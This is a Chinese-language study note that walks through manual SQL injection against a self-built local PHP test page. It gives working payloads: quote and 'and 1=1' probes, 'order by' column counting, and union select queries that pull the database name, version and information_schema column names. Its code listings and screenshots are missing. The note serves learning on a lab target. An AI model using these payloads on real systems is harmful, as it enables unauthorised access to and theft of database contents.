学习笔记---Sql注入实战篇

学习笔记—Sql注入实战篇

一、编写注入的网页，用于实战。
index.php


link.php



在老板火狐中开启hackbar, 进行sql注入。

Google中hackbar**方法：
https://www.fujieace.com/hacker/tools/hackbar.html

二、Sql注入基本流程（实战篇）：

输入单引号报如下错误

1=1与1=2的区别:（参考链接： https://www.cnblogs.com/xyz315/p/13043950.html）第一步，判断是否存在sql注入漏洞
构造 ?id=5 and 1=1 ，回车

页面返回正常
构造 ?id=5 and 1=2 ,回车

第二步:判断字段数
构造 ?id=1 and 1=1 order by 1 回车
http://127.0.0.1/7-27/index.php
?id=5)order by 1–+
–+注释语句，具体分析可参考下列文章：
https://blog.****.net/xiayun1995/article/details/86500605




输入1,2,3,4可以正常显示，输入5则报错：






第三步:查询相关内容
查询当前数据库名
构造 ?id=1 and 1=2 union select 1,database() 回车

查询当前数据库版本
构造 ?id=1 and 1=2 union select 1,version() 回车



查询当前数据库密码

拿到了密码
http://www.91ri.org/1551.html（万能密码实战）


http://127.0.0.1/7-27/index.php
?id=1 union select column_name,2,3,4 from information_schema.columns where table_schema=database()

了解更多请关注下列公众号：